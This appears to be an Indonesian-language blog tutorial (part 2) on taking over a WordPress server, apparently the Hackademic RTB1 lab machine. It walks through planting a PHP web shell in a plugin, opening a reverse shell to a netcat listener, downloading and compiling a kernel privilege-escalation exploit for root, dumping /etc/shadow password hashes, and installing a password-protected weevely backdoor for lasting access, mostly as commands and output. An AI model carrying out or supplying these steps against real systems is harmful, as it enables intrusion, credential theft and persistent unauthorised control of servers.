Berikut ini adalah artikel lanjutan dari Part 1.
Ayo simak dengan baik dan seksama :D
Ok mari kita coba untuk meng-upload php web shell untuk menjalankan beberapa perintah linux di server situs Anda. Kami akan mengedit sebuah plugin di wordpress "Textile" atau plugin yang Anda temukan di halaman plugin.
Dan memilih untuk mengeditnya
Kami akan memasukkan php web shell bukan plugin yang nyata. Setelah kita melakukan ini, kita akan memukul "file update" dan browse ke baru kami php shell
Woo, php shell ternyata bisa. Sekarang kita dapat memanipulasi file situs Anda, tetapi kami hanya ingin mendapatkan root pada server Anda dan hack semua situs lain juga.
Kami akan memilih tab "back-connect" dari php web shell dan membuat kembali koneksi ke ip Anda "192.168.1.6" pada port "5555"
Tapi sebelum kita connect, pertama kita membuat netcat pada port "5555" pada mesin kami
Sekarang tekan menghubungkan dan Anda akan melihat:
Mari kita coba beberapa perintah linux
id
uid=48(apache) gid=489(apache) groups=489(apache)
pwd
/var/www/html/Hackademic_RTB1/wp-content/plugins
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
Id Command digunakan untuk menunjukkan kepada kita apa yang user id, kelompok.
PWD command digunakan untuk menunjukkan kepada kita jalan Anda saat ini di server.
uname –a command digunakan untuk menunjukkan kepada kita beberapa informasi tentang versi kernel.
Ok, sekarang kita tahu bahwa versi server kernel 2.6.31.5-127.fc12.1686
Mari kita cari di exploit-db.com untuk mengeksploitasi ke versi ini atau versi yang lebih baru.
Kami akan cari "kernel 2.6.31"
Date
|
D
|
A
|
V
| Description |
Plat.
|
Author
| |
2009-10-15 |
-
| Linux Kernel < 2.6.31-rc4 nfs4_proc_lock() Denial of Service |
904
| ||||
2009-08-31 |
-
| Linux Kernel < 2.6.31-rc7 AF_IRDA 29-Byte Stack Disclosure Exploit |
1370
| ||||
2009-08-25 |
-
| Linux Kernel <= 2.6.31-rc7 AF_LLC getsockname 5-Byte Stack Disclosure |
1059
| ||||
2009-08-04 |
-
| Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure Exploit |
1064
|
Tak satu pun dari ini akan sesuai dengan tagihan karena tak satu pun dari mereka adalah hak eksploitasi eskalasi. Ini yang berikutnya, adalah.
Date
|
D
|
A
|
V
| Description |
Plat.
|
Author
| |
2010-10-19 |
-
| Linux RDS Protocol Local Privilege Escalation |
9977
|
http://www.exploit-db.com/exploits/15285
Aku membuka url ini dan copy link ini
http://www.exploit-db.com/download/15285
Dan membuat perintah ini pada shell netcat saya
wget http://www.exploit-db.com/download/15285 -O roro.c
--2011-12-28 00:48:01-- http://www.exploit-db.com/download/15285
Resolving www.exploit-db.com... 199.27.135.111, 199.27.134.111
Connecting to www.exploit-db.com|199.27.135.111|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://www.exploit-db.com/download/15285/ [following]
--2011-12-28 00:48:02-- http://www.exploit-db.com/download/15285/
Connecting to www.exploit-db.com|199.27.135.111|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7154 (7.0K) [application/txt]
Saving to: `roro.c'
0K ...... 100% 29.7K=0.2s
Kami menggunakan perintah wget untuk mengambil exploit dari exploit-db.com dan digunakan -O untuk ke roro.c
INGAT! exploits kernel linux sebagian besar sedang dikembangkan dalam bahasa c sehingga kita bisa dengan ekstensi .c, hanya melihat sumber exploit dan Anda akan menemukannya.
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/utsname.h>
#define RECVPORT 5555
#define SENDPORT 6666
intprep_sock(intport)
{
ints, ret;
structsockaddr_in addr;
s = socket(PF_RDS, SOCK_SEQPACKET, 0);
if(s < 0) {
printf(“[*] Could not open socket.\n”);
exit(-1);
}
memset(&addr, 0, sizeof(addr)); |
Semua baris di atas menunjukkan bahwa ini mengeksploitasi ditulis dalam bahasa C
Setelah kita diselamatkan mengeksploitasi kami di server, kita akan mengkompilasi ke format elf dengan mengetikkan gcc roro.c –o roro
Dan jalankan exploit kami dengan mengetikkan
./roroAnd after that we type Id
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_proto_ops to 0xe09f0b20
[+] Resolved rds_ioctl to 0xe09db06a
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting function pointer...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_proto_ops to 0xe09f0b20
[+] Resolved rds_ioctl to 0xe09db06a
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
Kita akan menemukan bahwa kita adalah root.
uid=0(root) gid=0(root)
Kita sekarang dapat melihat file /etc/shadow.
cat /etc/shadowDan lihat file /etc/passwd.
root:$6$4l1OVmLPSV28eVCT$FqycC5mozZ8mqiqgfudLsHUk7R1EMU/FXw3pOcOb39LXekt9VY6HyGkXcLEO.ab9F9t7BqTdxSJvCcy.iYlcp0:14981:0:99999:7:::
bin:*:14495:0:99999:7:::
daemon:*:14495:0:99999:7:::
adm:*:14495:0:99999:7:::
lp:*:14495:0:99999:7:::
sync:*:14495:0:99999:7:::
shutdown:*:14495:0:99999:7:::
halt:*:14495:0:99999:7:::
mail:*:14495:0:99999:7:::
uucp:*:14495:0:99999:7:::
operator:*:14495:0:99999:7:::
games:*:14495:0:99999:7:::
gopher:*:14495:0:99999:7:::
ftp:*:14495:0:99999:7:::
nobody:*:14495:0:99999:7:::
vcsa:!!:14557::::::
avahi-autoipd:!!:14557::::::
ntp:!!:14557::::::
dbus:!!:14557::::::
rtkit:!!:14557::::::
nscd:!!:14557::::::
tcpdump:!!:14557::::::
avahi:!!:14557::::::
haldaemon:!!:14557::::::
openvpn:!!:14557::::::
apache:!!:14557::::::
saslauth:!!:14557::::::
mailnull:!!:14557::::::
smmsp:!!:14557::::::
smolt:!!:14557::::::
sshd:!!:14557::::::
pulse:!!:14557::::::
gdm:!!:14557::::::
p0wnbox.Team:$6$rPArLuwe8rM9Avwv$a5coOdUCQQY7NgvTnXaFj2D5SmggRrFsr6TP8g7IATVeEt37LUGJYvHM1myhelCyPkIjd8Yv5olMnUhwbQL76/:14981:0:99999:7:::
mysql:!!:14981::::::
cat /etc/passwdKita dapat memecahkan semua password pengguna dengan alat "John The Ripper".
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:499:virtual console memory owner:/dev:/sbin/nologin
avahi-autoipd:x:499:498:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rtkit:x:498:494:RealtimeKit:/proc:/sbin/nologin
nscd:x:28:493:NSCD Daemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
avahi:x:497:492:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
haldaemon:x:68:491:HAL daemon:/:/sbin/nologin
openvpn:x:496:490:OpenVPN:/etc/openvpn:/sbin/nologin
apache:x:48:489:Apache:/var/www:/sbin/nologin
saslauth:x:495:488:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
mailnull:x:47:487::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:486::/var/spool/mqueue:/sbin/nologin
smolt:x:494:485:Smolt:/usr/share/smolt:/sbin/nologin
sshd:x:74:484:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pulse:x:493:483:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
gdm:x:42:481::/var/lib/gdm:/sbin/nologin
p0wnbox.Team:x:500:500:p0wnbox.Team:/home/p0wnbox.Team:/bin/bash
mysql:x:27:480:MySQL Server:/var/lib/mysql:/bin/bash
Tapi kita tidak akan melakukan hal ini, kami ingin mempertahankan akses di server ini sehingga kita dapat datang untuk mengunjungi / hack setiap saat.
Kami akan menggunakan weevely ke backdoor php kecil dan dikodekan dengan password dilindungi dan meng-upload ini backdoor php ke server kami.
Ayo kita lakukan!
1 - Opsi penggunaan weevely:
root@bt:/pentest/backdoors/web/weevely# ./main.py -2 – Membuat backdoor php dengan password koko dengan menggunakan weevely:
Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
Usage: main.py [options]
Options:
-h, --help show this help message and exit
-g, --generate Generate backdoor crypted code, requires -o and -p .
-o OUTPUT, --output=OUTPUT
Output filename for generated backdoor .
-c COMMAND, --command=COMMAND
Execute a single command and exit, requires -u and -p
.
-t, --terminal Start a terminal-like session, requires -u and -p .
-C CLUSTER, --cluster=CLUSTER
Start in cluster mode reading items from the give
file, in the form 'label,url,password' where label is
optional.
-p PASSWORD, --password=PASSWORD
Password of the encrypted backdoor .
-u URL, --url=URL Remote backdoor URL .
root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o hax.php -p koko
Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
+ Backdoor file 'hax.php' created with password 'koko'.
3 – Upload backdoor php kita ke server menggunakan php web shell
Dan setelah kita upload itu kita akan terhubung dengan mengunakan
root@bt:/pentest/backdoors/web/weevely# ./main.py -t -u http://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -p koko
Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
+ Using method 'system()'.
+ Retrieving terminal basic environment variables .
[apache@HackademicRTB1 /var/www/html/Hackademic_RTB1/wp-content/plugins]
Testing backdoor kita hax.php
Biasakan sebelum berkomentar, bagikan link ke teman anda untuk membantu kami membuat artikel lainnya yang bermanfaat. Komentar yang kami balas hanya yang berguna dan bermanfaat.
Emoticon Emoticon